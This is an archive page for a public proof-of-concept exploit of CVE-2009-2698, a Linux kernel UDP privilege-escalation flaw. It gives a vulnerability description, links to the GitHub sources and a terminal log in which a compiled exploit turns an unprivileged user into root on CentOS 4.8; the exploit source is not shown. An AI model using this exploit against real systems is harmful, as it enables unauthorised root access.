CVE-2009-2698 PoC — Linux kernel 代码问题漏洞

Source

https://github.com/xiaoxiaoleo/CVE-2009-2698

Associated Vulnerability

Title:Linux kernel 代码问题漏洞 (CVE-2009-2698)
Description:Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4 implementation是其中的一个分布式文件系统协议。 Linux Kernel 2.6.19之前版本的net/ipv4/udp.c和net/ipv6/udp.c中的UDP实现的udp_sendmsg函数中存在权限提升漏洞。本地非特权用户可借助与MSG_MORE标记和UDP套接字有关的向量获得特权或导致拒绝服务（空指针解引用和系统崩溃）。

Description

CVE-2009-2698 compiled for CentOS 4.8

Readme

# CVE-2009-2698
CVE-2009-2698 compiled for CentOS 4.8
> https://github.com/SecWiki/linux-kernel-exploits/tree/4dca098e7491efc83903494d7c00f24c843aae99/2009/CVE-2009-2698

# Detail

```
[hacker@localhost ~]$ id
uid=500(hacker) gid=500(hacker) groups=500(hacker) context=user_u:system_r:unconfined_t
[hacker@localhost ~]$ gcc 36108.c  -o exp
[hacker@localhost ~]$ ./exp
sh-3.00# id
uid=0(root) gid=0(root) groups=500(hacker) context=user_u:system_r:unconfined_t
sh-3.00# uname -an
Linux localhost.localdomain 2.6.9-89.EL #1 Mon Jun 22 12:19:40 EDT 2009 i686 i686 i386 GNU/Linux
sh-3.00# 
```

File Snapshot


 [4.0K]  /data/pocs/e819d5afa5bb29e18ae22a3016133bd25194fa5f
├── [6.8K]  exp
└── [ 590]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!